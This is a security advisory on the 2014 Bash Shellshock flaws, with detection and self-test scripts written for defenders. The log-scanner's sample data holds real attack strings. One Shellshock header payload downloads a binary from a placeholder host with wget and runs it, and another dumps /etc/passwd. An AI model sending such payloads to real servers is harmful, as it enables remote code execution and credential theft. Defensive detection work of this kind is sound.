Security experts expect the Bash Shellshock bug to have significant and widespread impact, potentially more devastating than Heartbleed.

On September 24, 2014, a vulnerability in Bash, now referred to as the ‘Shellshock’ bug, was publicly announced after its discovery the previous week by Stephane Chazelas. The original CVE entry (CVE-2014-6271) in the NIST National Vulnerability Database rates the severity of this vulnerability as a “10 out of 10” and provides the following description:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Shortly after the original flaw in Bash went public, a researcher found a similar flaw that was not addressed by the first patch; it was assigned CVE-2014-7169.

Impact

The Shellshock Bash bug allows remote code execution, unauthorized disclosure of information, unauthorized modification, and disruption of service.

Bash, the Bourne-again shell, is a Unix shell and one of the most widely installed utilities on any Linux system. The vulnerability arises from the way Bash imports shell functions from its environment: a variable whose value begins with “() {” is parsed as a function definition when Bash starts, and a vulnerable Bash keeps parsing past the closing brace and executes whatever commands follow it. An attacker who can set an environment variable before Bash is invoked (for example through a CGI request header, an SSH ForceCommand session or a DHCP option) therefore gets arbitrary command execution as soon as the shell starts. The name of the crafted variable does not matter, only its contents.

Within a few hours of the first issue being public (CVE-2014-6271), various exploits were seen live.
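The CGI vector above works because web servers copy request headers such as User-Agent and Referer into environment variables (HTTP_USER_AGENT, HTTP_REFERER) before starting the script, so the payload lands in the environment without the attacker ever touching a script parameter. The following is an added example, not code from the original advisory, that looks for the function-definition prefix Bash's importer keys on in web server access logs. The log lines in SAMPLE_LOG are constructed for this example and the addresses are documentation ranges; the function names are my own.

```shell
#!/bin/sh
# Added example: find Shellshock probes in Apache-style combined access logs.
# SAMPLE_LOG is constructed for this example (not real traffic); it shows a
# payload in the User-Agent field and one in the Referer field, plus benign lines.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:02:03 +0000] "GET /index.html HTTP/1.1" 200 3210 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 81 "() { :; }; echo; /bin/cat /etc/passwd" "-"
192.0.2.44 - - [25/Sep/2014:10:03:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "curl/7.30.0"'

# Print every log line containing a Bash function-definition prefix: "()" then
# optional whitespace then "{". Bash only treats a variable as a function when
# the value starts this way, so this is the one token every payload must carry.
# Reads the files given as arguments, or stdin when none are given.
shellshock_hits() {
    grep -E '\(\)[[:space:]]*\{' "$@"
}

# Count the matching lines (tr strips the padding some wc builds emit).
shellshock_hit_count() {
    shellshock_hits "$@" | wc -l | tr -d ' '
}

# Run the detector over the constructed sample and return the number of hits.
demo_hit_count() {
    printf '%s\n' "$SAMPLE_LOG" | shellshock_hit_count
}

# Extract just the source addresses of the hits, one per line, de-duplicated,
# which is what you would feed into a blocklist or a threat-intel lookup.
demo_hit_sources() {
    printf '%s\n' "$SAMPLE_LOG" | shellshock_hits | cut -d' ' -f1 | sort -u
}

demo_hit_count
demo_hit_sources
```

Run it against a real log with shellshock_hits /var/log/apache2/access.log (or pipe the log in). The pattern is deliberately loose about whitespace because the live payloads seen in 2014 used both “() {” and “(){”; keep it as a grep on the raw line rather than on the parsed User-Agent field, since the same payload can arrive in any header.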

Affected Versions of Bash

The vulnerability is present in GNU Bash versions 1.14 through 4.3 inclusive.

You can check whether you are vulnerable by running the following two commands in your default shell, which on many systems will be Bash. The first tests /bin/sh; the second tests the first bash found on your PATH. If you see the word “vulnerable” in the output, you are at risk. If not, then either your Bash is fixed or /bin/sh is a different shell.

		env X="() { :;} ; echo vulnerable" /bin/sh -c "echo completed"
		env X="() { :;} ; echo vulnerable" `which bash` -c "echo completed"

At-risk systems print “vulnerable” in the output of these commands; a fixed Bash prints only “completed”.
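The two commands above only cover the original flaw. Because the first fix was incomplete, a patch check should also probe CVE-2014-7169, which is a parser bug rather than a trailing-command bug: on an affected Bash the crafted value below makes the parser treat the “echo” in the -c string as a redirection target, so a file named echo appears in the working directory. The following added example, not code from the original advisory, wraps both probes into a single function; it assumes the Bash binary to test is passed as the first argument (defaulting to the first bash on PATH), and the CVE-2014-7169 probe is the file-creation test published in the Red Hat FAQ cited below.

```shell
#!/bin/sh
# Added example: test one Bash binary for CVE-2014-6271 and CVE-2014-7169.
# Usage: check_bash [/path/to/bash]   (defaults to the first bash on PATH)
# Prints a verdict and returns 0 (clean), 1 (vulnerable) or 2 (could not test).
check_bash() {
    bin="${1:-$(command -v bash || true)}"
    if [ -z "$bin" ] || [ ! -x "$bin" ]; then
        echo "no bash binary found"
        return 2
    fi

    # CVE-2014-6271: a function definition in any variable, followed by a
    # trailing command. A vulnerable Bash runs 'echo vulnerable' while importing
    # the environment, before it ever gets to the -c string.
    out=$(env X='() { :;}; echo vulnerable' "$bin" -c 'echo completed' 2>/dev/null || true)
    case "$out" in
        *vulnerable*)
            echo "vulnerable (CVE-2014-6271)"
            return 1 ;;
    esac

    # CVE-2014-7169: the first patch left a parser bug. With this value a
    # vulnerable Bash mis-parses '>\' and redirects output into a file named
    # 'echo' in the current directory. Run in a scratch directory so a
    # vulnerable shell cannot litter (or clobber) anything real.
    tmp=$(mktemp -d) || { echo "could not create temp dir"; return 2; }
    ( cd "$tmp" && env 'X=() { (a)=>\' "$bin" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -f "$tmp/echo" ]; then
        rm -rf "$tmp"
        echo "vulnerable (CVE-2014-7169)"
        return 1
    fi
    rm -rf "$tmp"

    echo "not vulnerable"
    return 0
}

# Report on the default bash and on /bin/sh, which on some distributions is a
# different shell and will simply report clean.
check_bash
check_bash /bin/sh
```

A clean result from this script means these two specific probes do not fire; it does not prove the binary is free of the later parser issues that followed, so still confirm the installed package version against your distribution's advisory.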

Recommendations

Patch at-risk systems so that no code can be executed after the end of an imported Bash function. Linux distributions, such as Red Hat and Fedora, are continuing to release guidance on patching the flaw. Do not assume that a single patch completely remedies the issue, because the first patch proved incomplete. Continue to monitor patch releases closely and re-run the checks above after each update.

References

  1. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
  2. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
  3. https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  4. https://securityblog.redhat.com/2014/09/26/frequently-asked-questions-about-the-shellshock-bash-flaws/